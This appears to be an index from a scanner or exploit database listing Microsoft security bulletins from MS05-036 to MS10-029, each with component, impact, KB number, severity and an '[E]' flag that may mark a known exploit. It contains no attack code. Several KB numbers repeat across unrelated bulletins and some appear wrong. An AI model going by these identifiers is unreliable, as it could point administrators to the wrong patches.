[E] MS10-029: Vulnerability in Windows ISATAP Component Could Allow Spoofing (978338) - Important
[E] MS10-028: Vulnerabilities in Microsoft Visio Could Allow Remote Code Execution (980094) - Critical
[E] MS10-024: Vulnerabilities in Microsoft Exchange and Windows SMTP Service Could Allow Denial of Service (981832) - Important
[E] MS10-022: Vulnerability in VBScript Scripting Engine Could Allow Remote Code Execution (981169) - Important
[E] MS10-021: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (979683) - Important
[E] MS10-020: Vulnerabilities in SMB Client Could Allow Remote Code Execution (980232) - Critical
[E] MS10-019: Vulnerabilities in Windows Authenticode Verification Could Allow Remote Code Execution (978601) - Critical
[E] MS10-018: Cumulative Security Update for Internet Explorer (980182) - Critical
[E] MS10-017: Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (980150) - Important
[E] MS10-016: Vulnerability in Windows Movie Maker Could Allow Remote Code Execution (975561) - Important
[E] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[E] MS10-014: Vulnerability in Kerberos Could Allow Denial of Service (977290) - Important
[E] MS10-013: Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution (977935) - Critical
[E] MS10-012: Vulnerabilities in SMB Server Could Allow Remote Code Execution (971468) - Important
[E] MS10-011: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (978037) - Important
[E] MS10-009: Vulnerabilities in Windows TCP/IP Stack Could Allow Remote Code Execution (974145) - Critical
[E] MS10-008: Vulnerabilities in ActiveX Controls Could Allow Remote Code Execution (977935) - Critical
[E] MS10-007: Vulnerability in Windows Shell Handler Could Allow Remote Code Execution (975713) - Critical
[E] MS10-006: Vulnerabilities in SMB Client Could Allow Remote Code Execution (978251) - Critical
[E] MS10-004: Vulnerabilities in Microsoft Office PowerPoint Could Allow Remote Code Execution (975416) - Critical
[E] MS10-003: Vulnerability in Microsoft Office (MSO) Could Allow Remote Code Execution (973965) - Critical
[E] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[E] MS10-001: Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution (972270) - Critical
[E] MS09-074: Vulnerability in Microsoft Project Could Allow Remote Code Execution (967183) - Critical
[E] MS09-073: Vulnerability in WordPad and Office Text Converters Could Allow Remote Code Execution (975539) - Critical
[E] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[E] MS09-071: Vulnerabilities in Internet Authentication Service Could Allow Remote Code Execution (974318) - Critical
[E] MS09-070: Vulnerabilities in Active Directory Federation Services Could Allow Remote Code Execution (971726) - Important
[E] MS09-069: Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of Service (974392) - Important
[E] MS09-068: Vulnerability in Microsoft Office Word Could Allow Remote Code Execution (976307) - Critical
[E] MS09-067: Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (972652) - Critical
[E] MS09-066: Vulnerability in Active Directory Could Allow Denial of Service (973309) - Important
[E] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[E] MS09-064: Vulnerability in License Logging Server Could Allow Remote Code Execution (974783) - Critical
[E] MS09-063: Vulnerability in Web Services on Devices API Could Allow Remote Code Execution (973565) - Critical
[E] MS09-062: Vulnerabilities in GDI+ Could Allow Remote Code Execution (957488) - Critical
[E] MS09-061: Vulnerabilities in the Microsoft .NET Framework Common Language Runtime Could Allow Remote Code Execution (974378) - Critical
[E] MS09-060: Vulnerabilities in Microsoft Office Outlook ActiveX Controls Could Allow Remote Code Execution (973917) - Critical
[E] MS09-059: Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of Service (975467) - Important
[E] MS09-058: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (971486) - Important
[E] MS09-057: Vulnerability in Indexing Service Could Allow Remote Code Execution (969059) - Important
[E] MS09-056: Vulnerabilities in Windows CryptoAPI Could Allow Spoofing (974571) - Important
[E] MS09-055: Cumulative Security Update for ActiveX Killbits (973525) - Critical
[E] MS09-054: Cumulative Security Update for Internet Explorer (974455) - Critical
[E] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[E] MS09-052: Vulnerability in Windows Media Player Could Allow Remote Code Execution (974112) - Critical
[E] MS09-051: Vulnerabilities in Windows Audio Compression Codecs Could Allow Remote Code Execution (975682) - Critical
[E] MS09-050: Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517) - Critical
[E] MS09-049: Vulnerability in Wireless LAN AutoConfig Service Could Allow Remote Code Execution (970710) - Critical
[E] MS09-048: Vulnerabilities in Windows TCP/IP Stack Could Allow Remote Code Execution (967723) - Critical
[E] MS09-047: Vulnerabilities in Windows Media Format Could Allow Remote Code Execution (973812) - Critical
[E] MS09-046: Vulnerability in DHTML Editing Component ActiveX Control Could Allow Remote Code Execution (956844) - Critical
[E] MS09-045: Vulnerability in JScript Scripting Engine Could Allow Remote Code Execution (971961) - Critical
[E] MS09-044: Vulnerabilities in Remote Desktop Connection Could Allow Remote Code Execution (970927) - Critical
[E] MS09-043: Vulnerability in Microsoft Office Web Components Could Allow Remote Code Execution (947319) - Critical
[E] MS09-042: Vulnerability in Telnet Could Allow Remote Code Execution (960859) - Critical
[E] MS09-041: Vulnerability in Workstation Service Could Allow Elevation of Privilege (971657) - Important
[E] MS09-040: Vulnerability in Message Queuing Could Allow Elevation of Privilege (971032) - Important
[E] MS09-039: Vulnerabilities in WINS Could Allow Remote Code Execution (969883) - Critical
[E] MS09-038: Vulnerabilities in Windows Media File Processing Could Allow Remote Code Execution (961501) - Critical
[E] MS09-037: Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution (973908) - Critical
[E] MS09-036: Vulnerability in Microsoft ASP.NET Could Allow Denial of Service (970957) - Important
[E] MS09-034: Cumulative Security Update for Internet Explorer (972260) - Critical
[E] MS09-032: Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution (973346) - Critical
[E] MS09-031: Vulnerability in Microsoft ISA Server 2006 Could Allow Elevation of Privilege (970953) - Important
[E] MS09-030: Vulnerability in Microsoft Office Publisher Could Allow Remote Code Execution (969516) - Important
[E] MS09-029: Vulnerabilities in the Embedded OpenType Font Engine Could Allow Remote Code Execution (961371) - Critical
[E] MS09-028: Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (971633) - Critical
[E] MS09-027: Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (969514) - Critical
[E] MS09-026: Vulnerability in RPC Could Allow Elevation of Privilege (970238) - Important
[E] MS09-025: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (971485) - Important
[E] MS09-022: Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution (961501) - Critical
[E] MS09-021: Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (969462) - Critical
[E] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[E] MS09-019: Cumulative Security Update for Internet Explorer (969897) - Critical
[E] MS09-018: Vulnerabilities in Active Directory Could Allow Remote Code Execution (971055) - Important
[E] MS09-017: Vulnerabilities in Microsoft Office PowerPoint Could Allow Remote Code Execution (967340) - Critical
[E] MS09-016: Vulnerabilities in Microsoft ISA Server and Forefront Threat Management Gateway Could Allow Denial of Service (970926) - Important
[E] MS09-015: Vulnerability in Blended Threat Removal Tool Could Allow Local Elevation of Privilege (959454) - Important
[E] MS09-014: Cumulative Security Update for Internet Explorer (963027) - Critical
[E] MS09-013: Vulnerabilities in Windows HTTP Services Could Allow Remote Code Execution (960803) - Critical
[E] MS09-012: Vulnerability in Windows Could Allow Elevation of Privilege (959454) - Important
[E] MS09-011: Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution (961373) - Critical
[E] MS09-010: Vulnerability in WordPad and Office Text Converters Could Allow Remote Code Execution (960477) - Critical
[E] MS09-008: Vulnerabilities in DNS Server Could Allow Spoofing (961063) - Important
[E] MS09-007: Vulnerability in SChannel Could Allow Spoofing (960225) - Important
[E] MS09-006: Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690) - Critical
[E] MS09-005: Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution (957634) - Critical
[E] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[E] MS09-003: Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (959239) - Critical
[E] MS09-002: Cumulative Security Update for Internet Explorer (961260) - Critical
[E] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[E] MS08-078: Security Update for Internet Explorer (960714) - Critical
[E] MS08-076: Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959051) - Critical
[E] MS08-075: Vulnerabilities in Windows Search Could Allow Remote Code Execution (958623) - Critical
[E] MS08-074: Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution (959070) - Critical
[E] MS08-073: Cumulative Security Update for Internet Explorer (958215) - Critical
[E] MS08-072: Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (957173) - Critical
[E] MS08-071: Vulnerabilities in GDI+ Could Allow Remote Code Execution (956420) - Critical
[E] MS08-070: Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349) - Critical
[E] MS08-069: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218) - Critical
[E] MS08-068: Vulnerability in SMB Could Allow Remote Code Execution (957097) - Critical
[E] MS08-067: Vulnerability in Server Service Could Allow Remote Code Execution (958644) - Critical
[E] MS08-066: Vulnerability in the Ancillary Function Driver Could Allow Elevation of Privilege (956803) - Important
[E] MS08-065: Vulnerability in Message Queuing Could Allow Remote Code Execution (951071) - Critical
[E] MS08-064: Vulnerability in Virtual Address Descriptor Manipulation Could Allow Elevation of Privilege (956841) - Important
[E] MS08-063: Vulnerability in SMB Could Allow Remote Code Execution (957095) - Critical
[E] MS08-062: Vulnerability in Internet Print Service Could Allow Remote Code Execution (953155) - Critical
[E] MS08-061: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (954211) - Critical
[E] MS08-060: Vulnerability in Active Directory Could Allow Remote Code Execution (957280) - Critical
[E] MS08-059: Vulnerability in Host Integration Server RPC Service Could Allow Remote Code Execution (956695) - Critical
[E] MS08-058: Cumulative Security Update for Internet Explorer (956390) - Critical
[E] MS08-057: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956464) - Critical
[E] MS08-056: Vulnerability in Microsoft Office Could Allow Information Disclosure (957699) - Important
[E] MS08-055: Vulnerability in Microsoft Office Could Allow Information Disclosure (956358) - Important
[E] MS08-054: Vulnerability in Windows Media Player Could Allow Information Disclosure (954154) - Important
[E] MS08-053: Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution (954156) - Critical
[E] MS08-052: Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593) - Critical
[E] MS08-051: Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (949347) - Critical
[E] MS08-050: Vulnerability in Windows Messenger could allow Information Disclosure (955702) - Important
[E] MS08-049: Vulnerabilities in Event System Could Allow Remote Code Execution (950974) - Critical
[E] MS08-048: Security Update for Outlook Express and Windows Mail (951066) - Critical
[E] MS08-047: Vulnerability in IPsec Policy Processing Could Allow Information Disclosure (953733) - Important
[E] MS08-046: Vulnerability in Microsoft Color Management System Could Allow Remote Code Execution (952954) - Critical
[E] MS08-045: Cumulative Security Update for Internet Explorer (953838) - Critical
[E] MS08-044: Vulnerabilities in Microsoft Office Filters Could Allow Remote Code Execution (924090) - Critical
[E] MS08-043: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (954066) - Critical
[E] MS08-042: Vulnerability in Microsoft Word Could Allow Remote Code Execution (954464) - Critical
[E] MS08-041: Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617) - Critical
[E] MS08-040: Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203) - Important
[E] MS08-039: Vulnerabilities in Outlook Web Access for Exchange Server Could Allow Elevation of Privilege (953747) - Important
[E] MS08-038: Vulnerability in Windows Explorer Could Allow Remote Code Execution (950582) - Critical
[E] MS08-037: Vulnerabilities in DNS Could Allow Spoofing (953230) - Critical
[E] MS08-036: Vulnerabilities in Pragmatic General Multicast (PGM) Could Allow Denial of Service (950762) - Important
[E] MS08-035: Vulnerabilities in Active Directory Could Allow Denial of Service (953235) - Important
[E] MS08-034: Vulnerability in WINS Could Allow Elevation of Privilege (948745) - Important
[E] MS08-033: Vulnerabilities in DirectX Could Allow Remote Code Execution (951698) - Critical
[E] MS08-032: Cumulative Security Update for Speech API (950763) - Critical
[E] MS08-031: Cumulative Security Update for Internet Explorer (950759) - Critical
[E] MS08-030: Vulnerability in Bluetooth Stack Could Allow Remote Code Execution (951376) - Critical
[E] MS08-029: Vulnerabilities in Microsoft Malware Protection Engine Could Allow Denial of Service (952044) - Important
[E] MS08-028: Vulnerability in Microsoft Jet Database Engine Could Allow Remote Code Execution (950749) - Critical
[E] MS08-026: Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (948560) - Critical
[E] MS08-025: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (948590) - Important
[E] MS08-024: Cumulative Security Update for Internet Explorer (947864) - Critical
[E] MS08-023: Security Update for ActiveX Killbits (948881) - Critical
[E] MS08-022: Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338) - Critical
[E] MS08-021: Vulnerabilities in GDI Could Allow Remote Code Execution (948597) - Critical
[E] MS08-020: Vulnerability in DNS Client Could Allow Spoofing (945556) - Important
[E] MS08-019: Vulnerabilities in Microsoft Visio Could Allow Remote Code Execution (944565) - Critical
[E] MS08-018: Vulnerabilities in Microsoft Project Could Allow Remote Code Execution (950183) - Critical
[E] MS08-016: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (949032) - Critical
[E] MS08-015: Vulnerability in Microsoft Outlook Could Allow Remote Code Execution (946665) - Critical
[E] MS08-014: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (948954) - Critical
[E] MS08-011: Vulnerabilities in Microsoft Works File Converter Could Allow Remote Code Execution (947081) - Critical
[E] MS08-010: Cumulative Security Update for Internet Explorer (944533) - Critical
[E] MS08-009: Vulnerability in Microsoft Word Could Allow Remote Code Execution (947077) - Critical
[E] MS08-008: Vulnerability in OLE Automation Could Allow Remote Code Execution (947890) - Critical
[E] MS08-007: Vulnerability in WebDAV Mini-Redirector Could Allow Remote Code Execution (946026) - Critical
[E] MS08-006: Vulnerability in Internet Information Services Could Allow Remote Code Execution (942831) - Critical
[E] MS08-005: Vulnerabilities in Internet Information Services Could Allow Elevation of Privilege (942830) - Important
[E] MS08-004: Vulnerability in TCP/IP Could Allow Denial of Service (946456) - Important
[E] MS08-003: Vulnerability in Active Directory Could Allow Denial of Service (943484) - Important
[E] MS08-002: Vulnerability in LSASS Could Allow Local Elevation of Privilege (943055) - Important
[E] MS08-001: Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644) - Critical
[E] MS07-069: Cumulative Security Update for Internet Explorer (942615) - Critical
[E] MS07-068: Vulnerability in Windows Media File Format Could Allow Remote Code Execution (941569) - Critical
[E] MS07-067: Vulnerability in Macrovision Driver Could Allow Local Elevation of Privilege (944653) - Important
[E] MS07-066: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (943078) - Important
[E] MS07-065: Vulnerability in Message Queuing Could Allow Remote Code Execution (937894) - Important
[E] MS07-064: Vulnerabilities in DirectX Could Allow Remote Code Execution (941568) - Critical
[E] MS07-063: Vulnerability in SMBv2 Could Allow Remote Code Execution (942624) - Critical
[E] MS07-062: Vulnerability in DNS Could Allow Spoofing (941672) - Important
[E] MS07-061: Vulnerability in Windows URI Handling Could Allow Remote Code Execution (943460) - Critical
[E] MS07-060: Vulnerability in Microsoft Outlook Could Allow Remote Code Execution (941090) - Critical
[E] MS07-059: Vulnerability in Windows SharePoint Services 3.0 and Microsoft Office SharePoint Server 2007 Could Allow Elevation of Privilege (942017) - Important
[E] MS07-058: Vulnerabilities in RPC Could Allow Denial of Service (933729) - Important
[E] MS07-057: Cumulative Security Update for Internet Explorer (939653) - Critical
[E] MS07-056: Security Update for Outlook Express and Windows Mail (941202) - Critical
[E] MS07-055: Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution (923810) - Critical
[E] MS07-054: Vulnerability in MSN Messenger and Windows Live Messenger Could Allow Remote Code Execution (942099) - Important
[E] MS07-053: Vulnerability in Windows Services for UNIX Could Allow Elevation of Privilege (939778) - Important
[E] MS07-052: Vulnerabilities in Crystal Reports for Visual Studio Could Allow Remote Code Execution (929729) - Important
[E] MS07-051: Vulnerability in Microsoft Agent Could Allow Remote Code Execution (938827) - Critical
[E] MS07-050: Vulnerability in Vector Markup Language Could Allow Remote Code Execution (938127) - Critical
[E] MS07-048: Vulnerabilities in Windows Gadgets Could Allow Remote Code Execution (938123) - Critical
[E] MS07-047: Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (936782) - Critical
[E] MS07-046: Vulnerability in GDI Could Allow Remote Code Execution (938829) - Critical
[E] MS07-045: Cumulative Security Update for Internet Explorer (937143) - Critical
[E] MS07-044: Vulnerability in Microsoft Excel Could Allow Remote Code Execution (940604) - Critical
[E] MS07-043: Vulnerability in OLE Automation Could Allow Remote Code Execution (938124) - Critical
[E] MS07-042: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (936227) - Critical
[E] MS07-041: Vulnerability in Internet Information Services Could Allow Remote Code Execution (939373) - Important
[E] MS07-040: Vulnerabilities in .NET Framework Could Allow Remote Code Execution (931212) - Important
[E] MS07-039: Vulnerabilities in Windows Active Directory Could Allow Remote Code Execution (935834) - Critical
[E] MS07-036: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (936542) - Critical
[E] MS07-035: Vulnerability in Win32 API Could Allow Remote Code Execution (935840) - Critical
[E] MS07-034: Cumulative Security Update for Outlook Express and Windows Mail (929123) - Critical
[E] MS07-033: Cumulative Security Update for Internet Explorer (933566) - Critical
[E] MS07-032: Vulnerability in Windows Vista Could Allow Information Disclosure (931213) - Important
[E] MS07-031: Vulnerabilities in Windows Schannel Security Package Could Allow Remote Code Execution (935843) - Critical
[E] MS07-030: Vulnerabilities in Microsoft Visio Could Allow Remote Code Execution (927051) - Critical
[E] MS07-029: Vulnerability in Windows DNS RPC Interface Could Allow Remote Code Execution (935966) - Critical
[E] MS07-028: Vulnerability in CAPICOM Could Allow Remote Code Execution (931906) - Critical
[E] MS07-027: Cumulative Security Update for Internet Explorer (931768) - Critical
[E] MS07-026: Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (931832) - Critical
[E] MS07-025: Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution (934233) - Critical
[E] MS07-024: Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (934232) - Critical
[E] MS07-023: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (934231) - Critical
[E] MS07-022: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (931784) - Important
[E] MS07-021: Vulnerabilities in CSRSS Could Allow Remote Code Execution (930178) - Critical
[E] MS07-020: Vulnerability in Microsoft Agent Could Allow Remote Code Execution (932168) - Critical
[E] MS07-019: Vulnerability in Universal Plug and Play Could Allow Remote Code Execution (931261) - Critical
[E] MS07-018: Vulnerabilities in Microsoft Content Management Server Could Allow Remote Code Execution (925939) - Critical
[E] MS07-017: Vulnerabilities in GDI Could Allow Remote Code Execution (925902) - Critical
[E] MS07-016: Cumulative Security Update for Internet Explorer (928090) - Critical
[E] MS07-015: Vulnerability in Microsoft Office Could Allow Remote Code Execution (932553) - Critical
[E] MS07-014: Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (929057) - Critical
[E] MS07-013: Vulnerability in Microsoft RichEdit Control Could Allow Remote Code Execution (918118) - Critical
[E] MS07-012: Vulnerability in Microsoft OLE Could Allow Remote Code Execution (926436) - Critical
[E] MS07-011: Vulnerability in Microsoft OLE Dialog Could Allow Remote Code Execution (926255) - Critical
[E] MS07-010: Vulnerability in Microsoft Malware Protection Engine Could Allow Remote Code Execution (932135) - Critical
[E] MS07-009: Vulnerability in Microsoft Data Access Components Could Allow Remote Code Execution (927779) - Critical
[E] MS07-008: Vulnerability in HTML Help ActiveX Control Could Allow Remote Code Execution (928804) - Critical
[E] MS07-007: Vulnerability in Windows Image Acquisition Service Could Allow Elevation of Privilege (927802) - Important
[E] MS07-006: Vulnerability in Windows Shell Could Allow Elevation of Privilege (928255) - Important
[E] MS07-005: Vulnerability in Step-by-Step Interactive Training Could Allow Remote Code Execution (923723) - Critical
[E] MS07-004: Vulnerability in Vector Markup Language Could Allow Remote Code Execution (929969) - Critical
[E] MS07-003: Vulnerabilities in Microsoft Outlook Could Allow Remote Code Execution (926549) - Critical
[E] MS07-002: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (927198) - Critical
[E] MS07-001: Vulnerability in Microsoft Office 2003 Could Allow Remote Code Execution (928259) - Critical
[E] MS06-078: Vulnerability in Windows Media Format Could Allow Remote Code Execution (923689) - Critical
[E] MS06-077: Vulnerability in Remote Installation Service Could Allow Remote Code Execution (926121) - Important
[E] MS06-076: Cumulative Security Update for Outlook Express (923694) - Critical
[E] MS06-075: Vulnerability in Windows could allow Elevation of Privilege (926255) - Important
[E] MS06-074: Vulnerability in SNMP Could Allow Remote Code Execution (926247) - Critical
[E] MS06-073: Vulnerability in Visual Studio 2005 Could Allow Remote Code Execution (925674) - Critical
[E] MS06-072: Cumulative Security Update for Internet Explorer (925454) - Critical
[E] MS06-071: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (928088) - Critical
[E] MS06-070: Vulnerability in Workstation Service Could Allow Information Disclosure (924270) - Important
[E] MS06-069: Vulnerabilities in Macromedia Flash Player from Adobe Could Allow Remote Code Execution (923789) - Critical
[E] MS06-068: Vulnerability in Microsoft Agent Could Allow Remote Code Execution (920213) - Critical
[E] MS06-067: Cumulative Security Update for Internet Explorer (922760) - Critical
[E] MS06-066: Vulnerability in Client Service for NetWare Could Allow Remote Code Execution (923414) - Important
[E] MS06-065: Vulnerability in Windows Object Packager Could Allow Remote Code Execution (924496) - Important
[E] MS06-064: Vulnerabilities in TCP/IP IPv6 Could Allow Denial of Service (922819) - Important
[E] MS06-063: Vulnerabilities in Server Service Could Allow Denial of Service (923414) - Important
[E] MS06-062: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (922581) - Critical
[E] MS06-061: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (924191) - Critical
[E] MS06-060: Vulnerability in Microsoft Word Could Allow Remote Code Execution (924554) - Critical
[E] MS06-059: Vulnerability in Microsoft Excel Could Allow Remote Code Execution (924165) - Critical
[E] MS06-058: Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (924162) - Critical
[E] MS06-057: Vulnerability in Windows Explorer Could Allow Remote Code Execution (923191) - Critical
[E] MS06-056: Vulnerabilities in ASP.NET 2.0 Could Allow Information Disclosure (922770) - Important
[E] MS06-055: Vulnerability in Vector Markup Language Could Allow Remote Code Execution (925486) - Critical
[E] MS06-053: Vulnerability in Indexing Service Could Allow Cross-Site Scripting (920685) - Important
[E] MS06-052: Vulnerabilities in Pragmatic General Multicast (PGM) Could Allow Remote Code Execution (919007) - Critical
[E] MS06-051: Vulnerability in Windows Kernel Could Allow Remote Code Execution (917422) - Critical
[E] MS06-050: Vulnerabilities in Microsoft Hyperlink Object Library Could Allow Remote Code Execution (920670) - Important
[E] MS06-049: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (920958) - Important
[E] MS06-048: Vulnerabilities in Microsoft Office PowerPoint Could Allow Remote Code Execution (916518) - Critical
[E] MS06-047: Vulnerabilities in Microsoft Visual Basic for Applications Could Allow Remote Code Execution (920981) - Critical
[E] MS06-046: Vulnerability in HTML Help ActiveX Control Could Allow Remote Code Execution (922616) - Critical
[E] MS06-045: Vulnerabilities in Windows Explorer Could Allow Remote Code Execution (918118) - Critical
[E] MS06-044: Vulnerability in Microsoft Management Console Could Allow Remote Code Execution (917772) - Critical
[E] MS06-043: Vulnerability in Microsoft Windows Could Allow Remote Code Execution (917344) - Critical
[E] MS06-042: Cumulative Security Update for Internet Explorer (918899) - Critical
[E] MS06-041: Vulnerability in DNS Resolution Could Allow Remote Code Execution (913446) - Critical
[E] MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) - Critical
[E] MS06-039: Vulnerabilities in Microsoft Office Filters Could Allow Remote Code Execution (915384) - Critical
[E] MS06-038: Vulnerability in Microsoft Office Could Allow Remote Code Execution (915094) - Critical
[E] MS06-037: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (917285) - Critical
[E] MS06-036: Vulnerability in DHCP Client Service Could Allow Remote Code Execution (914389) - Critical
[E] MS06-035: Vulnerabilities in Server Service Could Allow Remote Code Execution (917772) - Critical
[E] MS06-034: Vulnerability in Microsoft Internet Information Services using ASP Could Allow Remote Code Execution (917537) - Critical
[E] MS06-032: Vulnerability in TCP/IP Could Allow Remote Code Execution (917953) - Critical
[E] MS06-031: Vulnerability in RPCSS Service Could Allow Remote Code Execution (917736) - Critical
[E] MS06-030: Vulnerability in Server Message Block Could Allow Elevation of Privilege (914389) - Important
[E] MS06-028: Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (916281) - Critical
[E] MS06-027: Vulnerability in Microsoft Word Could Allow Remote Code Execution (917336) - Critical
[E] MS06-026: Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (913580) - Critical
[E] MS06-025: Vulnerability in Routing and Remote Access Technology Could Allow Remote Code Execution (911280) - Critical
[E] MS06-024: Vulnerabilities in Microsoft Windows Media Player Could Allow Remote Code Execution (917734) - Critical
[E] MS06-023: Vulnerabilities in Microsoft JScript Could Allow Remote Code Execution (917344) - Critical
[E] MS06-022: Vulnerabilities in Windows Script Host Could Allow Remote Code Execution (913580) - Critical
[E] MS06-021: Cumulative Security Update for Internet Explorer (916281) - Critical
[E] MS06-020: Vulnerabilities in Macromedia Flash Player from Adobe Could Allow Remote Code Execution (913433) - Critical
[E] MS06-019: Vulnerability in Microsoft Exchange Server Could Allow Remote Code Execution (912442) - Critical
[E] MS06-018: Vulnerability in Microsoft Distributed Transaction Coordinator Could Allow Denial of Service (913580) - Important
[E] MS06-016: Security Update for Microsoft Outlook Express (911567) - Critical
[E] MS06-015: Vulnerability in Windows Explorer Could Allow Remote Code Execution (908531) - Critical
[E] MS06-014: Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562) - Critical
[E] MS06-013: Cumulative Security Update for Internet Explorer (912812) - Critical
[E] MS06-012: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (905413) - Critical
[E] MS06-011: Permissive Windows Services ACLs Could Allow Elevation of Privilege (914388) - Important
[E] MS06-010: Vulnerability in Microsoft PowerPoint 2000 Could Allow Information Disclosure (886179) - Important
[E] MS06-008: Vulnerability in Web Client Service Could Allow Remote Code Execution (911927) - Important
[E] MS06-007: Vulnerability in TCP/IP Could Allow Denial of Service (913446) - Important
[E] MS06-006: Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564) - Critical
[E] MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution (911565) - Critical
[E] MS06-004: Cumulative Security Update for Internet Explorer (910620) - Critical
[E] MS06-003: Vulnerability in TNEF Decoding Could Allow Remote Code Execution (902412) - Critical
[E] MS06-002: Vulnerability in Embedded Web Fonts Could Allow Remote Code Execution (905915) - Critical
[E] MS06-001: Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (912919) - Critical
[E] MS05-055: Vulnerability in Windows Kernel Could Allow Denial of Service (905414) - Important
[E] MS05-054: Cumulative Security Update for Internet Explorer (905915) - Critical
[E] MS05-053: Vulnerabilities in Graphics Rendering Engine Could Allow Remote Code Execution (896424) - Critical
[E] MS05-052: Cumulative Security Update for Internet Explorer (896688) - Critical
[E] MS05-051: Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400) - Critical
[E] MS05-050: Vulnerability in DirectShow Could Allow Remote Code Execution (904706) - Critical
[E] MS05-049: Vulnerabilities in Windows Shell Could Allow Remote Code Execution (900725) - Critical
[E] MS05-048: Vulnerability in the Microsoft Collaboration Data Objects Could Allow Remote Code Execution (907245) - Critical
[E] MS05-047: Vulnerability in Plug and Play Could Allow Remote Code Execution and Elevation of Privilege (899588) - Critical
[E] MS05-046: Vulnerability in the Client Service for NetWare Could Allow Remote Code Execution (899589) - Critical
[E] MS05-045: Vulnerability in Network Connection Manager could allow Denial of Service (905414) - Important
[E] MS05-044: Vulnerability in the Windows FTP Client Could Allow File Transfer Location Tampering (905495) - Important
[E] MS05-043: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (896423) - Critical
[E] MS05-042: Vulnerabilities in Kerberos Could Allow Denial of Service, Information Disclosure, and Spoofing (899587) - Important
[E] MS05-041: Vulnerability in Remote Desktop Protocol Could Allow Denial of Service (899591) - Important
[E] MS05-040: Vulnerability in Telephony Service Could Allow Remote Code Execution (893756) - Critical
[E] MS05-039: Vulnerability in Plug and Play Could Allow Remote Code Execution and Elevation of Privilege (899588) - Critical
[E] MS05-038: Cumulative Security Update for Internet Explorer (896727) - Critical
[E] MS05-037: Vulnerability in JView Profiler Could Allow Remote Code Execution (903235) - Important
[E] MS05-036: Vulnerability in Microsoft Color Management Module Could Allow Remote Code Execution (901214) - Critical
